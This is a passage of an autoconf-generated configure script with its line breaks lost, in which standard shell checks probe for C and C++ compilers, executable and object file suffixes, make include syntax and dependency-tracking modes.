as_fn_error $? "Your 'rm' program is bad, sorry." "$LINENO" 5 fi fi # Check for dependencies (C++, AR, Lex, Yacc and Make) ac_ext=cpp ac_cpp='$CXXCPP $CPPFLAGS' ac_compile='$CXX -c $CXXFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CXX -o conftest$ac_exeext $CXXFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_cxx_compiler_gnu if test -z "$CXX"; then if test -n "$CCC"; then CXX=$CCC else if test -n "$ac_tool_prefix"; then for ac_prog in g++ c++ gpp aCC CC cxx cc++ cl.exe FCC KCC RCC xlC_r xlC do # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. set dummy $ac_tool_prefix$ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_CXX+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$CXX"; then ac_cv_prog_CXX="$CXX" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_CXX="$ac_tool_prefix$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi CXX=$ac_cv_prog_CXX if test -n "$CXX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CXX" >&5 $as_echo "$CXX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$CXX" && break done fi if test -z "$CXX"; then ac_ct_CXX=$CXX for ac_prog in g++ c++ gpp aCC CC cxx cc++ cl.exe FCC KCC RCC xlC_r xlC do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_CXX+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_CXX"; then ac_cv_prog_ac_ct_CXX="$ac_ct_CXX" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_CXX="$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_CXX=$ac_cv_prog_ac_ct_CXX if test -n "$ac_ct_CXX"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CXX" >&5 $as_echo "$ac_ct_CXX" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$ac_ct_CXX" && break done if test "x$ac_ct_CXX" = x; then CXX="g++" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac CXX=$ac_ct_CXX fi fi fi fi # Provide some information about the compiler. $as_echo "$as_me:${as_lineno-$LINENO}: checking for C++ compiler version" >&5 set X $ac_compile ac_compiler=$2 for ac_option in --version -v -V -qversion; do { { ac_try="$ac_compiler $ac_option >&5" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_compiler $ac_option >&5") 2>conftest.err ac_status=$? if test -s conftest.err; then sed '10a\ ... rest of stderr output deleted ... 10q' conftest.err >conftest.er1 cat conftest.er1 >&5 fi rm -f conftest.er1 conftest.err $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } done cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF ac_clean_files_save=$ac_clean_files ac_clean_files="$ac_clean_files a.out a.out.dSYM a.exe b.out" # Try to create an executable without -o first, disregard a.out. # It will help us diagnose broken compilers, and finding out an intuition # of exeext. { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether the C++ compiler works" >&5 $as_echo_n "checking whether the C++ compiler works... " >&6; } ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'` # The possible output files: ac_files="a.out conftest.exe conftest a.exe a_out.exe b.out conftest.*" ac_rmfiles= for ac_file in $ac_files do case $ac_file in *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; * ) ac_rmfiles="$ac_rmfiles $ac_file";; esac done rm -f $ac_rmfiles if { { ac_try="$ac_link_default" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_link_default") 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; then : # Autoconf-2.13 could set the ac_cv_exeext variable to `no'. # So ignore a value of `no', otherwise this would lead to `EXEEXT = no' # in a Makefile. We should not override ac_cv_exeext if it was cached, # so that the user can short-circuit this test for compilers unknown to # Autoconf. for ac_file in $ac_files '' do test -f "$ac_file" || continue case $ac_file in *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; [ab].out ) # We found the default executable, but exeext='' is most # certainly right. break;; *.* ) if test "${ac_cv_exeext+set}" = set && test "$ac_cv_exeext" != no; then :; else ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` fi # We set ac_cv_exeext here because the later test for it is not # safe: cross compilers may not add the suffix if given an `-o' # argument, so we may need to know it at that point already. # Even if this section looks crufty: it has the advantage of # actually working. break;; * ) break;; esac done test "$ac_cv_exeext" = no && ac_cv_exeext= else ac_file='' fi if test -z "$ac_file"; then : { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } $as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 $as_echo "$as_me: error: in \`$ac_pwd':" >&2;} as_fn_error 77 "C++ compiler cannot create executables See \`config.log' for more details" "$LINENO" 5; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: yes" >&5 $as_echo "yes" >&6; } fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking for C++ compiler default output file name" >&5 $as_echo_n "checking for C++ compiler default output file name... " >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_file" >&5 $as_echo "$ac_file" >&6; } ac_exeext=$ac_cv_exeext rm -f -r a.out a.out.dSYM a.exe conftest$ac_cv_exeext b.out ac_clean_files=$ac_clean_files_save { $as_echo "$as_me:${as_lineno-$LINENO}: checking for suffix of executables" >&5 $as_echo_n "checking for suffix of executables... " >&6; } if { { ac_try="$ac_link" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_link") 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; then : # If both `conftest.exe' and `conftest' are `present' (well, observable) # catch `conftest.exe'. For instance with Cygwin, `ls conftest' will # work properly (i.e., refer to `conftest.exe'), while it won't with # `rm'. for ac_file in conftest.exe conftest conftest.*; do test -f "$ac_file" || continue case $ac_file in *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;; *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'` break;; * ) break;; esac done else { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 $as_echo "$as_me: error: in \`$ac_pwd':" >&2;} as_fn_error $? "cannot compute suffix of executables: cannot compile and link See \`config.log' for more details" "$LINENO" 5; } fi rm -f conftest conftest$ac_cv_exeext { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_exeext" >&5 $as_echo "$ac_cv_exeext" >&6; } rm -f conftest.$ac_ext EXEEXT=$ac_cv_exeext ac_exeext=$EXEEXT cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ #include int main () { FILE *f = fopen ("conftest.out", "w"); return ferror (f) || fclose (f) != 0; ; return 0; } _ACEOF ac_clean_files="$ac_clean_files conftest.out" # Check that the compiler produces executables we can run. If not, either # the compiler is broken, or we cross compile. { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are cross compiling" >&5 $as_echo_n "checking whether we are cross compiling... " >&6; } if test "$cross_compiling" != yes; then { { ac_try="$ac_link" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_link") 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; } if { ac_try='./conftest$ac_cv_exeext' { { case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_try") 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; }; then cross_compiling=no else if test "$cross_compiling" = maybe; then cross_compiling=yes else { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 $as_echo "$as_me: error: in \`$ac_pwd':" >&2;} as_fn_error $? "cannot run C++ compiled programs. If you meant to cross compile, use \`--host'. See \`config.log' for more details" "$LINENO" 5; } fi fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $cross_compiling" >&5 $as_echo "$cross_compiling" >&6; } rm -f conftest.$ac_ext conftest$ac_cv_exeext conftest.out ac_clean_files=$ac_clean_files_save { $as_echo "$as_me:${as_lineno-$LINENO}: checking for suffix of object files" >&5 $as_echo_n "checking for suffix of object files... " >&6; } if ${ac_cv_objext+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF rm -f conftest.o conftest.obj if { { ac_try="$ac_compile" case "(($ac_try" in *\"* | *\`* | *\\*) ac_try_echo=\$ac_try;; *) ac_try_echo=$ac_try;; esac eval ac_try_echo="\"\$as_me:${as_lineno-$LINENO}: $ac_try_echo\"" $as_echo "$ac_try_echo"; } >&5 (eval "$ac_compile") 2>&5 ac_status=$? $as_echo "$as_me:${as_lineno-$LINENO}: \$? = $ac_status" >&5 test $ac_status = 0; }; then : for ac_file in conftest.o conftest.obj conftest.*; do test -f "$ac_file" || continue; case $ac_file in *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;; *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'` break;; esac done else $as_echo "$as_me: failed program was:" >&5 sed 's/^/| /' conftest.$ac_ext >&5 { { $as_echo "$as_me:${as_lineno-$LINENO}: error: in \`$ac_pwd':" >&5 $as_echo "$as_me: error: in \`$ac_pwd':" >&2;} as_fn_error $? "cannot compute suffix of object files: cannot compile See \`config.log' for more details" "$LINENO" 5; } fi rm -f conftest.$ac_cv_objext conftest.$ac_ext fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_objext" >&5 $as_echo "$ac_cv_objext" >&6; } OBJEXT=$ac_cv_objext ac_objext=$OBJEXT { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether we are using the GNU C++ compiler" >&5 $as_echo_n "checking whether we are using the GNU C++ compiler... " >&6; } if ${ac_cv_cxx_compiler_gnu+:} false; then : $as_echo_n "(cached) " >&6 else cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { #ifndef __GNUC__ choke me #endif ; return 0; } _ACEOF if ac_fn_cxx_try_compile "$LINENO"; then : ac_compiler_gnu=yes else ac_compiler_gnu=no fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext ac_cv_cxx_compiler_gnu=$ac_compiler_gnu fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_cxx_compiler_gnu" >&5 $as_echo "$ac_cv_cxx_compiler_gnu" >&6; } if test $ac_compiler_gnu = yes; then GXX=yes else GXX= fi ac_test_CXXFLAGS=${CXXFLAGS+set} ac_save_CXXFLAGS=$CXXFLAGS { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $CXX accepts -g" >&5 $as_echo_n "checking whether $CXX accepts -g... " >&6; } if ${ac_cv_prog_cxx_g+:} false; then : $as_echo_n "(cached) " >&6 else ac_save_cxx_werror_flag=$ac_cxx_werror_flag ac_cxx_werror_flag=yes ac_cv_prog_cxx_g=no CXXFLAGS="-g" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_cxx_try_compile "$LINENO"; then : ac_cv_prog_cxx_g=yes else CXXFLAGS="" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_cxx_try_compile "$LINENO"; then : else ac_cxx_werror_flag=$ac_save_cxx_werror_flag CXXFLAGS="-g" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_cxx_try_compile "$LINENO"; then : ac_cv_prog_cxx_g=yes fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext fi rm -f core conftest.err conftest.$ac_objext conftest.$ac_ext ac_cxx_werror_flag=$ac_save_cxx_werror_flag fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_prog_cxx_g" >&5 $as_echo "$ac_cv_prog_cxx_g" >&6; } if test "$ac_test_CXXFLAGS" = set; then CXXFLAGS=$ac_save_CXXFLAGS elif test $ac_cv_prog_cxx_g = yes; then if test "$GXX" = yes; then CXXFLAGS="-g -O2" else CXXFLAGS="-g" fi else if test "$GXX" = yes; then CXXFLAGS="-O2" else CXXFLAGS= fi fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu DEPDIR="${am__leading_dot}deps" ac_config_commands="$ac_config_commands depfiles" { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether ${MAKE-make} supports the include directive" >&5 $as_echo_n "checking whether ${MAKE-make} supports the include directive... " >&6; } cat > confinc.mk << 'END' am__doit: @echo this is the am__doit target >confinc.out .PHONY: am__doit END am__include="#" am__quote= # BSD make does it like this. echo '.include "confinc.mk" # ignored' > confmf.BSD # Other make implementations (GNU, Solaris 10, AIX) do it like this. echo 'include confinc.mk # ignored' > confmf.GNU _am_result=no for s in GNU BSD; do { echo "$as_me:$LINENO: ${MAKE-make} -f confmf.$s && cat confinc.out" >&5 (${MAKE-make} -f confmf.$s && cat confinc.out) >&5 2>&5 ac_status=$? echo "$as_me:$LINENO: \$? = $ac_status" >&5 (exit $ac_status); } case $?:`cat confinc.out 2>/dev/null` in #( '0:this is the am__doit target') : case $s in #( BSD) : am__include='.include' am__quote='"' ;; #( *) : am__include='include' am__quote='' ;; esac ;; #( *) : ;; esac if test "$am__include" != "#"; then _am_result="yes ($s style)" break fi done rm -f confinc.* confmf.* { $as_echo "$as_me:${as_lineno-$LINENO}: result: ${_am_result}" >&5 $as_echo "${_am_result}" >&6; } # Check whether --enable-dependency-tracking was given. if test "${enable_dependency_tracking+set}" = set; then : enableval=$enable_dependency_tracking; fi if test "x$enable_dependency_tracking" != xno; then am_depcomp="$ac_aux_dir/depcomp" AMDEPBACKSLASH='\' am__nodep='_no' fi if test "x$enable_dependency_tracking" != xno; then AMDEP_TRUE= AMDEP_FALSE='#' else AMDEP_TRUE='#' AMDEP_FALSE= fi depcc="$CXX" am_compiler_list= { $as_echo "$as_me:${as_lineno-$LINENO}: checking dependency style of $depcc" >&5 $as_echo_n "checking dependency style of $depcc... " >&6; } if ${am_cv_CXX_dependencies_compiler_type+:} false; then : $as_echo_n "(cached) " >&6 else if test -z "$AMDEP_TRUE" && test -f "$am_depcomp"; then # We make a subdir and do the tests there. Otherwise we can end up # making bogus files that we don't know about and never remove. For # instance it was reported that on HP-UX the gcc test will end up # making a dummy file named 'D' -- because '-MD' means "put the output # in D". rm -rf conftest.dir mkdir conftest.dir # Copy depcomp to subdir because otherwise we won't find it if we're # using a relative directory. cp "$am_depcomp" conftest.dir cd conftest.dir # We will build objects and dependencies in a subdirectory because # it helps to detect inapplicable dependency modes. For instance # both Tru64's cc and ICC support -MD to output dependencies as a # side effect of compilation, but ICC will put the dependencies in # the current directory while Tru64 will put them in the object # directory. mkdir sub am_cv_CXX_dependencies_compiler_type=none if test "$am_compiler_list" = ""; then am_compiler_list=`sed -n 's/^#*\([a-zA-Z0-9]*\))$/\1/p' < ./depcomp` fi am__universal=false case " $depcc " in #( *\ -arch\ *\ -arch\ *) am__universal=true ;; esac for depmode in $am_compiler_list; do # Setup a source with many dependencies, because some compilers # like to wrap large dependency lists on column 80 (with \), and # we should not choose a depcomp mode which is confused by this. # # We need to recreate these files for each test, as the compiler may # overwrite some of them when testing with obscure command lines. # This happens at least with the AIX C compiler. : > sub/conftest.c for i in 1 2 3 4 5 6; do echo '#include "conftst'$i'.h"' >> sub/conftest.c # Using ": > sub/conftst$i.h" creates only sub/conftst1.h with # Solaris 10 /bin/sh. echo '/* dummy */' > sub/conftst$i.h done echo "${am__include} ${am__quote}sub/conftest.Po${am__quote}" > confmf # We check with '-c' and '-o' for the sake of the "dashmstdout" # mode. It turns out that the SunPro C++ compiler does not properly # handle '-M -o', and we need to detect this. Also, some Intel # versions had trouble with output in subdirs. am__obj=sub/conftest.${OBJEXT-o} am__minus_obj="-o $am__obj" case $depmode in gcc) # This depmode causes a compiler race in universal mode. test "$am__universal" = false || continue ;; nosideeffect) # After this tag, mechanisms are not by side-effect, so they'll # only be used when explicitly requested. if test "x$enable_dependency_tracking" = xyes; then continue else break fi ;; msvc7 | msvc7msys | msvisualcpp | msvcmsys) # This compiler won't grok '-c -o', but also, the minuso test has # not run yet. These depmodes are late enough in the game, and # so weak that their functioning should not be impacted. am__obj=conftest.${OBJEXT-o} am__minus_obj= ;; none) break ;; esac if depmode=$depmode \ source=sub/conftest.c object=$am__obj \ depfile=sub/conftest.Po tmpdepfile=sub/conftest.TPo \ $SHELL ./depcomp $depcc -c $am__minus_obj sub/conftest.c \ >/dev/null 2>conftest.err && grep sub/conftst1.h sub/conftest.Po > /dev/null 2>&1 && grep sub/conftst6.h sub/conftest.Po > /dev/null 2>&1 && grep $am__obj sub/conftest.Po > /dev/null 2>&1 && ${MAKE-make} -s -f confmf > /dev/null 2>&1; then # icc doesn't choke on unknown options, it will just issue warnings # or remarks (even with -Werror). So we grep stderr for any message # that says an option was ignored or not supported. # When given -MP, icc 7.0 and 7.1 complain thusly: # icc: Command line warning: ignoring option '-M'; no argument required # The diagnosis changed in icc 8.0: # icc: Command line remark: option '-MP' not supported if (grep 'ignoring option' conftest.err || grep 'not supported' conftest.err) >/dev/null 2>&1; then :; else am_cv_CXX_dependencies_compiler_type=$depmode break fi fi done cd .. rm -rf conftest.dir else am_cv_CXX_dependencies_compiler_type=none fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $am_cv_CXX_dependencies_compiler_type" >&5 $as_echo "$am_cv_CXX_dependencies_compiler_type" >&6; } CXXDEPMODE=depmode=$am_cv_CXX_dependencies_compiler_type if test "x$enable_dependency_tracking" != xno \ && test "$am_cv_CXX_dependencies_compiler_type" = gcc3; then am__fastdepCXX_TRUE= am__fastdepCXX_FALSE='#' else am__fastdepCXX_TRUE='#' am__fastdepCXX_FALSE= fi ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}gcc", so it can be a program name with args. set dummy ${ac_tool_prefix}gcc; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_CC+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_CC="${ac_tool_prefix}gcc" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi CC=$ac_cv_prog_CC if test -n "$CC"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 $as_echo "$CC" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_CC"; then ac_ct_CC=$CC # Extract the first word of "gcc", so it can be a program name with args. set dummy gcc; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_CC+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_CC"; then ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_CC="gcc" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_CC=$ac_cv_prog_ac_ct_CC if test -n "$ac_ct_CC"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 $as_echo "$ac_ct_CC" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_CC" = x; then CC="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac CC=$ac_ct_CC fi else CC="$ac_cv_prog_CC" fi if test -z "$CC"; then if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}cc", so it can be a program name with args. set dummy ${ac_tool_prefix}cc; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_CC+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_CC="${ac_tool_prefix}cc" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi CC=$ac_cv_prog_CC if test -n "$CC"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 $as_echo "$CC" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi fi if test -z "$CC"; then # Extract the first word of "cc", so it can be a program name with args. set dummy cc; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_CC+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else ac_prog_rejected=no as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then if test "$as_dir/$ac_word$ac_exec_ext" = "/usr/ucb/cc"; then ac_prog_rejected=yes continue fi ac_cv_prog_CC="cc" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS if test $ac_prog_rejected = yes; then # We found a bogon in the path, so make sure we never use it. set dummy $ac_cv_prog_CC shift if test $# != 0; then # We chose a different compiler from the bogus one. # However, it has the same basename, so the bogon will be chosen # first if we set CC to just the basename; use the full file name. shift ac_cv_prog_CC="$as_dir/$ac_word${1+' '}$@" fi fi fi fi CC=$ac_cv_prog_CC if test -n "$CC"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 $as_echo "$CC" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$CC"; then if test -n "$ac_tool_prefix"; then for ac_prog in cl.exe do # Extract the first word of "$ac_tool_prefix$ac_prog", so it can be a program name with args. set dummy $ac_tool_prefix$ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_CC+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$CC"; then ac_cv_prog_CC="$CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_CC="$ac_tool_prefix$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi CC=$ac_cv_prog_CC if test -n "$CC"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $CC" >&5 $as_echo "$CC" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$CC" && break done fi if test -z "$CC"; then ac_ct_CC=$CC for ac_prog in cl.exe do # Extract the first word of "$ac_prog", so it can be a program name with args. set dummy $ac_prog; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_CC+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_CC"; then ac_cv_prog_ac_ct_CC="$ac_ct_CC" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_CC="$ac_prog" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_CC=$ac_cv_prog_ac_ct_CC if test -n "$ac_ct_CC"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_CC" >&5 $as_echo "$ac_ct_CC" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi test -n "$ac_ct_CC" && break done if test "x$ac_ct_CC" = x; then CC="" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} 